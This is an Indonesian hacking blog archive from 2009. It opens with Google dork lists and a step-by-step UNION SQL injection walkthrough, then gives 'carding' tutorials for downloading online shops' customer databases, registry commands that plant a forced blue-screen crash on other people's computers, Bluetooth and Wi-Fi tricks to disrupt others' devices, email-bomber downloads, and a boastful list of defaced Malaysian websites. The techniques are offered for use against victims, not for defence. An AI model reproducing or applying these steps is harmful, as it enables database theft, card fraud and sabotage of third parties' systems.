inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

WOW!!! Buanyak buanget suanget kuebeluet matiet en dibeluit-beluit (APA SEEH?????)

Jika udah ketemu, misal: www.korbansqli.com/news.php?id=5
1. Tambah single quote (') pada belakang URL, contoh: www.korbansqli.com/news.php?id=5'
2. Cari angka dalam columns: tambahkan dibelakan URL: order by 1/* contoh: www.korbansqli.com/news.php?id=5 order by 1/*
angka 1 untuk menghitung angka, jadi, jika tidak ada error, ganti nomor 2, jika tidak ada error juga, ganti jadi 3 dan seterusnya, contoh:
www.korbansqli.com/news.php?id=5 order by 1/* =Gak error
www.korbansqli.com/news.php?id=5 order by 2/* =Gak error
www.korbansqli.com/news.php?id=5 order by 3/* =Gak error
www.korbansqli.com/news.php?id=5 order by 4/* =ERROR

Nah, kalo error-nya di 4, berarti ada 3 angka
3. Cek UNION Function
Tambahkan di belakang URL: union all select 1,2,3/* Contoh: www.korbansqli.com/news.php?id=5 union all select 1,2,3/*
Jika ada tulisan contoh: 1 atau 2 atau 3 berarti UNION-nya bekerja...
4. Cek MySQL Version
NOTE: kalo diatas (3) UNION-nya gak bisa, coba /* diganti --
Contohnya, di layar ada angka 2, nah, angka 2 pada URL diganti @@version atau version() dan anda akan mendapat 4.1.33-log atau 5.0.45 atau semacamnya
Jika anda mendapatkan "union + illegal (IMPLICIT + COERCIBLE)..."
Yang kita butuhkan adalah convert()
Contoh: www.korbansqli.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
Atau memakai hex() atau unhex():
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version using latin1)),3/*
Dan kamu dapet MySQL Version...
5. Mendapatkan nama Table dan Column
TO BE CONTINUED (TERLALU BANYAK)

Freeze Access Point aka AP

2009-09-03T21:20:00.004+07:00

Akhirnya update juga, Oke teman-teman, kita akan belajar tentang Block beberapa MAC Address dari Access Point untuk mengakses Internet.
TUJUAN:
- Iseng
- Berinternet dengan cepat karena jika ada beberapa komputer mengakses AP, Semakin lambat akses internetnya...

Belum tau apa itu AP atau WiFi atau semacamnya? kita cerita bentar, ceritanya, anda disebuah kantor yang ada WiFi-nya, lalu pas istirahat, semuanya pada WiFi-an, nah, kan banyak orang yang akses, jadi internet anda semakin lambat, karena semakin banyak orang akses, semakin lambat, Perumpamaanya: Ada sebuah ember (AP) dan Selang yang sedang mengisi air kedalam ember (Speed Internet), nah, Selang itu dibolongi kecil satu (Pengguna) semakin banyak bolongan (Semakin banyak user) Semakin sedikit air yang bisa sampai ke Ember (AP)
Begitulah kira-kira gambaran kita tentang masalah ini...

Dalam tutorial ini, Spesifikasinya adalah:
- WiFi Card PCI : D-Link DWL-G10 AirPlus
- OS: Windows XP
Spesifikasi Target:
- Access Point : WRT54G
- Firmware : Firmware 5.0
Persiapan:
- Pastikan WiFi konek ke AP
- Application: MC Afee Wireless Home Network Security (Googling ajah nyarinya...)
- Pastikan Aplikasi diatas bisa di-install

Tutorial:
1. Install dulu yee yang MCAffee itu...
2. Kalo udah, buka aplikasinya, lalu pilih AP target trus double klik, trus muncul beberapa MAC Address deh...
3. Klik kanan ke MAC Address Sasaran, lalu Block! tapi HATI-HATI! siapa tau itu MAC Address kita... Sasaran nggak bisa konek sebelum di un-block lagi...

Ending:
Ini adalah contoh "Application Malfunction" (Penyalah-gunaan Aplikasi) seperti Hack Billing Warnet dengan ZHider. Kita gak perlu susah-susah dapet password admin, dll. cukup pake Aplikasi MCAfee tersebut, GAME OVER...

OK, Selamat perang WiFi... (hehehe...)

Penulis: lirva32
Sumber: www.spyrozone.net

Ngerjain Satpam dengan mengakali Radio

2009-09-02T16:56:00.004+07:00

Dengan ini, kamu bisa join ngobrol sama si satpam yang sedang berwalky-talky, tuh, Gila gak tuh???
Caranya nih,
Persiapan:
- Radio yang bisa nyari frekuensi
- Kaleng Bekas (jangan kaleng susu yang masih penuh yaa... ^_^)
- Benda sejenis tali yang bisa mengirim getaran (Contoh dalam tutorial ini: Kabel)
- Ada korban pak satpam...

Oke, go to tutorial
1. Kaleng bekas dibolongi pantatnya, lalu kabel disambungkan ke kaleng (kayak pengen bikin telepon pake kaleng lhoo...)
2. Kabel sisi satunya (yang bukan diiket sama kaleng), kamu iket dengan antena radio.
Gambar (biar gak bingung):

3. Antena Radio kamu arahin ke pak satpam yang ber-walky-talky lalu cari frekuensi di radio (penulis asli yakin anda bisa karena Walky talky satpam tuh gede frekuensinya...

Selesai tutor diatas, kamu bisa join dah ngomong di walky-talky...
Hehehehehe.......

Udah yee... Funny bukan? Hahaha...

---END---

Penulis: sevenC / NO:7 & JOE_VICKY
Sumber: www.spyrozone.net

C++ Untuk membuat Calculator Sederhana

2009-09-02T16:31:00.003+07:00

Udah 3 Hari gak ada postingan mengakibatkan 2 hari ini gak ada pengunjung, gini deh, saya mau share tentang apa yang saya dapat dari google, yaitu tentang programming (akhirnya ada juga artikel tentang programming.)
Nah, kita sekarang obrolin C++ (blom apa-apa udah blagu sama C++...)
Nih dia, Kalkulator untuk Ce ples ples...
Code:
#include
#include
void menu();
void jumlah();
void kurang();
void kali();
void bagi();void main()
{
char chrPilihan;
do
{
menu();
fflush(stdin);
scanf(”%c”,&chrPilihan);
if ((chrPilihan == ‘x’)||(chrPilihan == ‘x’))
{ printf(”Thanks for use this program… egie_ku@yahoo.com”);
break;} switch (chrPilihan)
{ case ‘1′:
jumlah();
break;
case ‘2′:
kurang();
break;
case ‘3′:
kali();
break;
case ‘4′:
bagi();
break;
default:
printf(”\nSorry bro.. Kode yang di imput salah…\n”);
}
}
while(chrPilihan != ‘x’);
}
void menu()
{
printf(” \n”);
printf(”Main Menu\n”);
printf(”==================\n”);
printf(”1. Operasi Penjumlahan\n”);
printf(”2. Operasi Pengurangan\n”);
printf(”3. Operasi Perkalian\n”);
printf(”4. Operasi Pembagian\n”);
printf(”x. Untuk Keluar\n”);
printf(” \n”);
printf(”Input kode masukkan,bro!!: “);
}
void jumlah()
{
int jumlah,bil1,bil2;
printf(”Bilangan 1 nya apa?? “);
scanf(”%d”,&bil1);
printf(”Bilangan kedua?? “);
scanf(”%d”,&bil2);
jumlah=bil1+bil2;
printf(”Hasilnya tambahannya %d\n”,jumlah);
printf(”\nPencet Enter buat lanjut..\n”);
getch();
}
void kurang()
{
int jumlah,bil1,bil2;
printf(”Bilangan 1 nya apa?? “);
scanf(”%d”,&bil1);
printf(”Bilangan kedua?? “);
scanf(”%d”,&bil2);
jumlah=bil1-bil2;
printf(”Hasilnya kurangannya %d\n”,jumlah);
printf(”\nPencet Enter buat lanjut..\n”);
getch();
}
void kali()
{
int jumlah,bil1,bil2;
printf(”Bilangan 1 nya apa?? “);
scanf(”%d”,&bil1);
printf(”Bilangan kedua?? “);
scanf(”%d”,&bil2);
jumlah=bil1*bil2;
printf(”Hasilnya kalinya %d\n”,jumlah);
printf(”\nPencet Enter buat lanjut..\n”);
getch();
}
void bagi()
{
int jumlah,bil1,bil2;
printf(”Bilangan 1 nya apa?? “);
scanf(”%d”,&bil1);
printf(”Bilangan kedua?? “);
scanf(”%d”,&bil2);
jumlah=bil1/bil2;
printf(”Hasilnya baginya %d\n”,jumlah);
printf(”\nPencet Enter buat lanjut..\n”);
getch();
}

Wew... Copas aje yee.... Oke....
Selamat Programming...

Sumber: www.nusinau.com

Note: Jika ada kesalahan atau keluhan tentang Code-code diatas, semoga anda memposkannya di komentar, dan saya akan perbaiki secepat-cepatnya.

The Hacker Versi HUT Malingsial

2009-08-31T20:34:00.003+07:00

Gila... Indonesia emank keren... neih, coba liat website-website yang udah kedeface untuk memeriahkan HUT Malingsial (wakakak... Memang Hacker yang sayang negara tetangga ^_^)

Ini ada BUANYAK website yang kedeface:
http://kurniakebal.com/indonesia.html
http://goiyoo.com/indonesia.html
http://nckt.com.my/indonesia.html
http://waittsb.com/indonesia.html
http://avowstech.com/indonesia.html
http://lmhwee.com/indonesia.html
http://goodcarelab.com/indonesia.html
http://interisland-sg.com/indonesia.html
http://ubiq1.com/indonesia.html
http://repfon.com/indonesia.html
http://academyadelphi.com/indonesia.html
http://tinmine-kl.com/indonesia.html
http://topsstudio.com/indonesia.html
http://winstravel.com.my/indonesia.html
http://rightgoals.com/indonesia.html
http://h20creative.com/indonesia.html
http://ahar-law.com/indonesia.html
http://jointtm.com/indonesia.html
http://venkat-transport.com.my/indonesia.html
http://msvfoods.com/indonesia.html
http://berjayabintangtimur.com.my/indonesia.html
http://newviking.com.my/indonesia.html
http://exaprisemm2h.com/indonesia.html
http://lucaschua.com/indonesia.html
http://anarkalihairdye.com/indonesia.html
http://wengsong.com.my/indonesia.html
http://ketravel.com.my/indonesia.html
http://relprosurgical.com/indonesia.html
http://txmservices.com/indonesia.html
http://stetsgroup.com/indonesia.html
http://justcerdik.com/indonesia.html
http://malaysiawelove.com/indonesia.html
http://murugantrading.com/indonesia.html
http://nbkinterior.com/indonesia.html
http://cherngfong.com/indonesia.html
http://yeenanthamleong.com/indonesia.html
http://pes-sg.com/indonesia.html
http://ixpdev.com/indonesia.html
http://pesonasenifoto.com/indonesia.html
http://bagsmalaysia.com/indonesia.html
http://jobsu1.com/indonesia.html
http://freecheapsite.com/indonesia.html
http://rnrengr.com/indonesia.html
http://HYH-ASEAN.org/indonesia.html
http://muzakraf.com.my/indonesia.html
http://PinnacleRestDemand.com/indonesia.html
http://dmarc.com.my/indonesia.html
http://I-PResources.com/indonesia.html
http://pms.com.my/indonesia.html
http://digilife.com.my/indonesia.html
http://fengshui.net.my/indonesia.html
http://pactechnologies.com.my/indonesia.html
http://rit.com.my/indonesia.html
http://propertiesu1.com/indonesia.html
http://msvfoods.com/indonesia.html
http://PinnacleRestDemand.com/indonesia.html
http://pumpkinproject.com/indonesia.html
http://nfirc.com/indonesia.html
http://rezamyt.com.my/indonesia.html
http://youth.org.my/indonesia.html
http://sjkckk2.edu.my/indonesia.html
http://soulart.com.my/indonesia.html
http://brilliantbag.com/indonesia.html
http://privilegenetwork.com/indonesia.html
http://remcorporation.com/indonesia.html
http://fxcmindonesia.com/indonesia.html
http://milaandbarton.com/indonesia.html
http://fxcmmalaysia.com/indonesia.html
http://fastrekglobal.com/indonesia.html
http://MORINOKAZE.COM.MY/indonesia.html
http://auto-charge.net/indonesia.html
http://nldlajpbranch.com/indonesia.html
http://sistersinislam.org.my/indonesia.html
http://plastechind.com/indonesia.html
http://healin.com.my/indonesia.html
http://citrineone.com/indonesia.html
http://indiavisa.com.my/indonesia.html
http://sgivacationclub.com/indonesia.html
http://wingspan.com.my/indonesia.html
http://kbc.com.my/indonesia.html
http://ippbm.gov.my/indonesia.html
http://coolcreative.com.my/indonesia.html
http://muzaventures.com/indonesia.html
http://winarich.com/indonesia.html
http://hydro-k.com/indonesia.html
http://laya.com.my/indonesia.html
http://lifecare2u.com/indonesia.html
http://al-faizeen.com.my/indonesia.html
http://klys.com.my/indonesia.html
http://muzaventures.com/indonesia.html
http://bionet-int.com/indonesia.html
http://egift.com.my/indonesia.html
http://fefi-bags.com/indonesia.html
http://nexxone.com/indonesia.html
http://jsloostudio.com/indonesia.html
http://topsstudio.com/indonesia.html
http://pdaunion.com.my/indonesia.html
http://focusarchitect.com/indonesia.html
http://dmn.com.my/indonesia.html
http://digilife.com.my/indonesia.html
http://youth.org.my/indonesia.html
http://sjkcfoonyew4.edu.my/indonesia.html
http://bagsmalaysia.com/indonesia.html
http://myfesclan.com/indonesia.html
http://huzzen.com/indonesia.html
http://equrus.com/indonesia.html
http://izymix.com/indonesia.html
http://sjkcfoonyew1.edu.my/indonesia.html
http://ypchua.com/indonesia.html
http://freecheapsite.com/indonesia.html
http://modtech-audio.com/indonesia.html
http://www.rondemo.com/
http://stu.org.my
http://globalmarine.com.my
http://www.mgpskuantan.edu.my
http://artside.info/
http://nbh.novabankinghall.com/nbh/
http://www.bpp.icu.gov.my/
http://www.leafyard.com
http://www.warrants.com.my/eng/
http://www.pinkguava.my/
http://anbe-sivam.com/lndex.htm
http://information.net.my/cache/

Sayang, saya gak ikutan, soalnya kemaren udah nge GAME OVER-in XSMBS Society sich... abis si admin blegug ngabisin code gw, gw kasih code yang megagiga ganas! (hehehe...) tapi kayaknya dia bakal nunggu bulan Ramadhan selesai... (saya gak puasa sih... jadi gak berperasaan deh... ^_^)
Oke, ou iya ye, selamat berpuasa bagi yang menjalankannya yee...

Sumber: yadoy666.serverisdown.org
Regrads.

Remote Killing Revolution (Cara ke 2, Pencegahan, dan Finishing)

2009-08-30T12:25:00.004+07:00

Sudah pernah baca Remote Killing pada label Windows Haking yang pertama? Nah, artikel inilah yang mengajarkan anda tentang cara kedua dan pencegahannya...
Langsung aja ke cara kedua!
1. Buka Command Prompt aka cmd
2. Ketik shutdown -i lalu enter!
3. Kebuka kan popup yang kemaren? Nah, daripada saya ngulang 2x mending baca aja dulu yang Remote Killing terdahulu...

Nah, kita akan bahas pencegahan...
1. Kalo udah ketemu sama popup system shutdown, cepat-cepat buka Microsoft Office Word! dan ketikkan "aku tidak mau mati" atau "AKU INGIN HIDUP 1000 Tahun lagi!!!!!" atau terserah deh, pokoknya TULIS!!! lalu setelah selesai tulis, JANGAN DISAVE! Jangan diapa-apain!
2. Waktu kematian tertulis 00.00.00 dan Windows berusaha menutup semua aplikasi-aplikasi Windows, pas Windows mau nutup Winword, Winword pun bertanya, apakah ingin save? JANGAN DIAPA-APAKAN! Kacangin aja tuh Winword...^_^
3. Beberapa saat kemudian, anda akan melihat popup seperti ini (tapi ada yang beda, kira-kira kayak gini):

Pilih saja Cancel. Dan Komputer anda sehat walafiat...

Pencegahan yang lebih waras (tadi itu versi gak warasnya... ^_^):
1. Saat-saat waktu eksekusi, lagsung secepat kilat buka Start lalu RUN
2. ketik shutdown -a

FINISHING (Jika anda admin dan melihat usernya menentangmu)
Ketika para user senyum-senyum karena sudah mencegah kematian sang komputer, Admin harusnya berkuasa disini (HAHAHA!!!) Langsung, buka cmd, ketik lagi shutdown -i lalu jangan beri centang Warn User of the action dan juga kosongin Planned.
Para user-pun tidak tau kalo komputernya mati tinggal hitungan detik...
---GAME OVER---

Sumber: Spyrozone.net
Credits: Spyrokid

BSOD Reloaded! (HTML Edition)

2009-08-29T22:04:00.002+07:00

Kita akan membuat lagi Be eS O De versi Ha Te eM eL...
Udah tau kan BSOD? Nah kita langsung Coding!

1. Buka Notepad
2. Copas Script INI
3. Save as File txt dengan TERSERAH-KAMU.html
4. Jalanin ^_^

We-Who-Write-This-Article tidak bertanggung jawab kalo ada kesalahan, kerusakan, penyakit, kecacatan, kematian, kehilangan ingatan, dll.

Special Thanks again to Spyrokid
www.spyrozone.net

Membuat Crash Komputer dengan JavaScript

2009-08-29T20:37:00.002+07:00

Apakah anda ingin memakai JavaScript untuk isengin orang lain cuma pake Internet Explorer dan Notepad? Inilah caranya!
1. Buka Notepad
2. Copas code di SINI
3. Lalu save as dengan index.html

Sudah??? Kita akan buka File index.html pake Internet Explorer (Pake Internet Explorer yaa...) Dan Lihatlah ~~pertunjukan gajah bermain bola~~ penampakan tergila! dan Mengerikan! Yaitu IE aka Internet Explorer membuka jendela browser terus menerus sampe Hang aka GAME OVER.

Cara Kerja:
Script tersebut membuat replikanya aka memanggil dirinya sendiri berkali-kali dengan cepat sampe GAME OVER aka Hang and Crash!

END of CONTENTS

Thanks to Spyrokid
www.spyrozone.net

YES!!! Situs Malingsial is GAME OVER!!!

2009-08-29T17:47:00.004+07:00

AHAHAHAHAHAHAHA!!!!!!!!
GAME OVER XSMBS Society!

Kesenengan gw...
Yawdah, coba kita liat apa yang sudah saya lakukan!
Ke SINI

HAHAHAHA!!!! YOU HACKED MALINGSIAL!!!

Merestart HP Orang pake Bluetooth

2009-08-29T12:33:00.005+07:00

Penjelasan:
Anda bisa merestart HP Symbian orang lain dengan Bluetooth

Bagaimanakah Caranya???
Meluncur ke Tutor yuks!!!
1. Buka Notepad
2. Tulis tanda kutip (") lalu klik Tab lalu ketik Restart lalu klik Tab lagi lalu klik tanda kutip lagi (") Bingung? Gini loooo: "[TAB]Restart[TAB]" (INGAT! PAKE TAB! BUKAN SPASI!!!)
3. Setelah itu, save aja Restart.txt
4. Kirim file Restart.txt ke HP anda
5. Trus buka filenya, trus copas text "[TAB]Restart[TAB]" lalu pastekan ke tempat masukin nama Bluetooth.

AKSI!!!
Datengin korban yang punya hp symbian, "Bro, gw bisa restart HP loe lewat Bluetooth tanpa nyentuh HP loe!"
Nah, pas HP anda kedetect sama HP korban, HP Korban-pun Te-restart...

BAGAIMANA ITU BISA TERJADI????
HP Symbian belum mengenal "Tab" jadi pas Bluetooth anda kedetect sama HP Korban, HP Korban memang mendetect, tapi ERROR pas menampilkan nama Bluetooth anda, jadi HP-nya kerestart and.....
---GAME OVER---

All Credits to Spyrokid
www.spyrozone.net

HORE! Bisa Upload Code!!!

2009-08-28T15:52:00.002+07:00

Puji Tuhan........

Kita sekarang sudah bisa berlega karena saya sudah menemukan Web Hosting sekaligus File Hosting... gak perlu lagi dipaksain lagi...

Yawdah, dengan ini kita bisa belajar lebih tenang...

Brute Force

2009-08-27T18:39:00.003+07:00

Maaf, kemarin ada ralat tentang postingan Menjadi Sang Penebak Password, Disana ditulis Brute Force itu menebak kata-kata seperti password, katasandi, dll. ITU SALAH!!!

Oke, sebenarnya Brute Force itu adalah menebak password dari aaaaa sampe zzzzz atau dari 0000 sampe 9999

Nah, Brute Force kalo pake tools aja bisa sebulan baru selesai...

Nah, menghindari ke-Brute Force cepat:
- Pilih huruf pertama jauh dari a misal: z, y, v, dll.
- Kombinasikan password dengan angka (lebih baik lebih dari 3 angka)
- Mendingan pake kombinasi antara asterix, koma, dan titik.

Sekian Postingan dari saya...

Tutorial Carding Reloaded

2009-08-27T17:38:00.002+07:00

Kita akan memulai Carding yang mudah...

Reloaded Version: Metacart Database

Yang dibutuhkan cuma 3 yaitu: Web Browser, Buka Blog ini, dan Jiwa dan Raga Kita (en op kors komputer ^_^)

Meluncur ke Tutor!!!
1. Menggoogle untuk cari korban dengan dork: allinurl:/metacart/
2. Nanti, kalo dapet kasih tau gw yang mana, nanti kita card sama-sama (becanda) kalo dapet korban, misalnya ketemu Korban, URL-nya adalah: www.korban.com/metacart/blablabla
3. Nah, kita apus sampe www.korban.com, lalu tambahin /metacart/database/metacart.mdb Jadinya: www.korban.com/metacart/database/metacart.mdb
4. Download Databasenya dan seperti biasa: "Buka file eM De Be-nya pake Microsoft Office Access

Gampang kan?
-----END-----

Sumber: (sama seperti Tutorial Carding sebelumnya, spyrozone.net)

Forum Bing-bing Coder

2009-08-27T15:21:00.001+07:00

Oke... Bing-Bing Coders akan berdiri tegak, tapi kapan yaa?
Yawdah, nanti kalo kita dah meresmikan berdirinya Bing-Bing Coders ini, saya kabarin...

Manifesto Seorang Hacker International

2009-08-26T17:37:00.001+07:00

Ini adalah dunia kami sekarang... dunia elektron dan sambungan, keindahan sang 'baud'. Kami menggunakan layanan yang sudah tersedia tanpa membayar harga yang seharusnya betul-betul murah jikasaja layanan tersebut tidak dijalankan oleh orang-orang rakus yang mencari untung, dan kalian menyebut kami penjahat. Kami menjelajah... dan kalian menyebut kami penjahat. Kami mengejar pengetahuan... dan kalian menyebut kami penjahat. Kami ada tanpa perbedaan warna kulit, tanpa perbedaan kebangsaan, tanpa prasangka keagamaan ... dan kalian sebut kami penjahat.

Kalian membuat bom, kalian berperang, kalian membunuh, mencurang, dan berbohong kepada kami sambil berusaha meyakinkan kami bahwa ini adalah untuk kebaikan semua, namun kamilah yang jahat.

Ya, aku adalah seorang kriminal.

"Kejahatanku adalah rasa keingintahuanku. Kejahatanku adalah menilai seseorang dari perkataan dan perbuatannya, bukan dari penampilannya. Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak akan kalian maafkan."

Aku adalah seorang Hacker, dan ini adalah manifestoku. Kalian bisa saja menghentikanku, namun kalian tak mungkin menghentikan kami semua ...

+++The Mentor+++

Tutorial Carding

2009-08-26T15:21:00.002+07:00

Setelah 2 hari 2 malam bersemayam di Spyrozone.net, saya menemukan kitab Carding.
Nah, kita mulai persiapan
- Web Browser

Udah? Itu doank? Yaiyalah! Nanti mau Carding malah gak pake web browser lagi... ^_^
Dikira pake tools laen yaa? hahahaha....
Oke, langsung meluncur ke tutorial!

1. Search di google dengan dork: allinurl:/shop/category.asp/catid=
2. Misalnya dapet korban, lalu kita meluncur ke halaman rahasia yuks!!! jadi kita apus semua URL sampai URL Home contoh: www.korbancarding.com
3. Nah, kita tambahin URL-nya dengan /admin/dbsetup.asp
Contoh: www.korbancarding.com/admin/dbsetup.asp
4. Abis itoe... Kita cari file: sdatapdshoppro.mdb en download it!
5. Cara Download'na kita ganti URL-nya menjadi www.korbancarding.com/data/pdshoppro.mdb
6. Buka pail eM De Be-nya dengan Microsoft Office Access
Tengkyu...
Tengkyu....

All Credits to SpyroKiD dari ftp seseorang yang sedang mendeface web-nya sendiri

Bug XSS pada budpar.go.id

2009-08-23T16:08:00.002+07:00

Ini adalah Website yang teraniaya oleh saya:
ScreenShot:
SCREENSHOT

Mau bukti yang lebih asli? coba Klik link INI
Kalo masih blom percaya, pasang banner ini di website anda ato blog anda:

Hehehehe....
Udah yaa....

FAQ Reloaded

2009-08-23T10:28:00.000+07:00

Ini adalah FAQ terbaru dari Darkness Hacker!

Q:Jika saya memakai tools tetapi saya memakai tools seperti Cracking Gamehouse alias gak 100% memakai tools apakah saya Lamer?
A:Tidak juga... banyak hacker memakai tool pencari admin login tetapi dia tetap memakai SQL Injection untuk mendapatkan akses...

Q:OS Apa yang sebaiknya saya pakai sebagai pemula?
A:Sebenernya Terserah, tetapi disarankan pake Linux (terserah sih, saya aja masih pake Windows XP)

Q:Rasanya ada yang kurang dari blog ini, bisa dijelaskan mengapa?
A: Untuk yang ini, Biasanya saya post permasalahan ini di darknezzdiary.blogspot.com, jika ada yang kurang dari darknezzdiary, mohon komentarnya...

Q:Mengapa sebagian besar dari isi blog ini dicopas dari situs lain?
A:Ya, namanya juga saya juga lagi tahap belajar, jadi saya sambil belajar, sambil blogging, dan sambil saya mentest sejauh mana saya sudah mengetahui tentang dengan hacking.

Q:Apakah google adalah tools yang paling hebat?
A:YA! benar sekali! Mengapa? kita bisa mencari tutorial, refrensi, dan bahkan korban.

Q:Apakah saya perlu mebaca seluruh blog ini?
A:Pilihan ada ditangan anda... (syukur kalo membaca seluruhnya ^_^.)

Q:Apakah anda bisa mengajarkan saya?
A:Gak bisa... Mengapa? karena saya juga punya kehidupan sendiri... Saran saya: Berlanggananlah artikel blog ini atau blog lain yang kira-kira bisa mengajarkan anda...

Q:Tolong jelaskan apa saja budaya hacker?
A:TPSS! (Tunggu postingan saya selanjutnya...)

END OF FAQ

SiBN (Service is Bring Nothing)

2009-08-22T15:39:00.002+07:00

SiBN??? Apaan tuh???
Hahaha... Saya cuma ngarang koq... SiBN adalah Tipe Hacking "Temporary" (sama kayak XSS) buatan saya sendiri (Hahaha!!!) Bagaimana caranya??? mungkin bisa modif URL (biasanya di game FB tuh!)
Nah... kita akan membuat SiBN!
Misal: Mini Dota Wars di Facebook Coba Maen dulu!
Nah, trus masukin URL ini ke Address Bar:
http://apps.facebook.com/dota-wars/?page&filter&attack_id&show_off_id=(no.id loe!!!)&buyRedirect_text=20+uses+of+Quarterstaff&target=marketplace
Nah, trus coba begini:
http://apps.facebook.com/dota-wars/?page&filter&attack_id&show_off_id=(no.id loe!!!)&buyRedirect_text=9999999999999999999+uses+of+Quarterstaff&target=marketplace
Nah! anda sekarang telah membeli 9999999999999999999 Quarterstaff!!!
ScreenShot:

Tapi coba liat ke Inventory dan Biasa aja! gak ada 9999999999999999999 Quarterstaff...

Nah! itu maksudnya SiBN!
Selamat mencoba!!!

Hack Billing Explorer

2009-08-22T13:13:00.005+07:00

Dengan tools ini, kita bisa hack Billing Warnet!
Coba DOWNLOAD!

Nah... Liat SS aja:

Tutor cara pake:
1. Pas dibuka, "seharusnya" udah kecatet IP Addressnya
2. Pilih Version
3. Isi PC berapa
4. Klik Recheck IP Address

Udah... Seterusnya pikir sendiri yaa! Hahahaha!!!

Kalo ada kesalahan, komentar aja...

Instant BSOD

2009-08-22T09:20:00.008+07:00

Sebelum kita lakukan Instant BSOD, Apa Be eS O De itu? BSOD adalah Blue Screen Of Death (HAHAHAHAHA!!!)
Blue Screen Of Death ini ciri-cirinya adalah:
- Tulisannya Putih
- Backgroundnya Biru
- Isi pesannya meminta kita untuk mematikan komputer
Biasanya para orang-orang ~~Sarap~~ awam, BSOD adalah kiamat bagi pengguna... dan tidak banyak juga orang-orang ~~sarap~~ awam yang mengambil jalan yang paling mulus yaitu ~~Bunuh diri~~ "Install Ulang" (Jurus paling ampuh ~~memerlukan 300 mana untuk mengaktifkannya~~)
Tapi bagi para Hacker (ceileeh ya enggak lah!) Tapi bagi yang sudah berpengalaman, biasanya nyari di Google dan kontak ama Microsoft langsung...
Udahlah! langsung ke tutor!!!
1. Buka Notepad
2. Copy Paste code dibawah ini sesuai tipe Keyboard anda ato korban:
USB Keyboard
echo Y|REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\kbdhid\Parameters /v CrashOnCtrlScroll /t REG_DWORD /d 1

PS / 2 Keyboard
echo Y|REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\i8042prt\Parameters /v CrashOnCtrlScroll /t REG_DWORD /d 1

Nah, Abis itu save dengan TERSERAH.bat, Abis itu, file bat itu di KLIK 2x lalu restart Komputer. Lalu kalo udah direstart, cara aktifkan Be eS O De-nya adalah:
Tekan dan Tahan Ctrl lalu tekan Scroll Lock dan TA-RA!!! BSOD dibuat!!! Gambarnya seperti Ini:

Note: Dianjurkan diaktifkan di komputer orang laen buat iseng (<<<>echo Y|reg delete HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Services\kbdhid\Parameters /v CrashOnCtrlScroll

PS / 2 Keyboard
echo Y|REG DELETE HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Services\i8042prt\Parameters /v CrashOnCtrlScroll

NOTE: Code-code diatas diusahakan biar ditulis dalam 1 Baris!!!
Nah... Udah yaa.... Kalo ada kesalahan, tanya om google ato om spyrokid yee...

Sumber: www.spyrozone.net
Penulis: Spyrokid

Email Bombers! (3 Pasukan siap berperang!)

2009-08-21T17:25:00.003+07:00

Yep! Pasukan-pasukan ini akan berperang!
Sebelum Download, harus tau apa sih itu Email Bomb?
Email Bomb adalah pengiriman Email secara Massive atau banyak-banyak atau multiple...

Oke, silahkan Download 3 Email bomber di SINI, SINI, dan di SINI!

Selamat Bombing!!!

Trik Social Engineering yang Bodoh

2009-08-21T12:38:00.002+07:00

Kita akan membahas tentang trik Social Engineering yang sangat-sangat bodoh...
Nih, kita belajar dari sebuah dongeng

Cerita ini hanyalah fiksi belaka, jika ada kesamaan tokoh, provider, applcation, dan komputer, mohon pelaku dipukul pake linggis sampai mati dan bakar rumahnya sampe komputernya hangus!!!

Stupid Phishing

Ceritanya begini:
Ada seseorang yang bernama Adi berumur 11 tahun, dia adalah seorang bocah yang bodohnya gak karuan pada pelajaran Komputer, tetapi masih aja maen Facebook, Yahoo Mesenger, GTalk (Jitak) walaupun sudah 10x ganti komputer...

Suatu hari, pas dia lagi asyik maen Mafia Wars di FB, dia di-add oleh orang yang gak dikenal yang bernama Joe Killer, tanpa pikir panjang, dia langsung Accept!
Lalu, si Joe Killer ini ngajak chatting... Inilah chattingnya:
Joe Killer: Halo...
Adi: Hai, kamu sapa y?
Joe Killer: Aku mau cari temen...
Adi: Ooh...
Joe Killer: Aku diremove oleh beberapa temenku karena aku seorang Phisher
Adi: Ap tuh Phisher?
Joe Killer: Gak usah dibahas deh... Kalo dibahas cuma menusuk hatiku...
Adi: Oh, maaf y...
Joe Killer: Gak apa-apa...
Adi: Btw, kmu maen Mafia Wars gak?
Joe Killer: Iya...
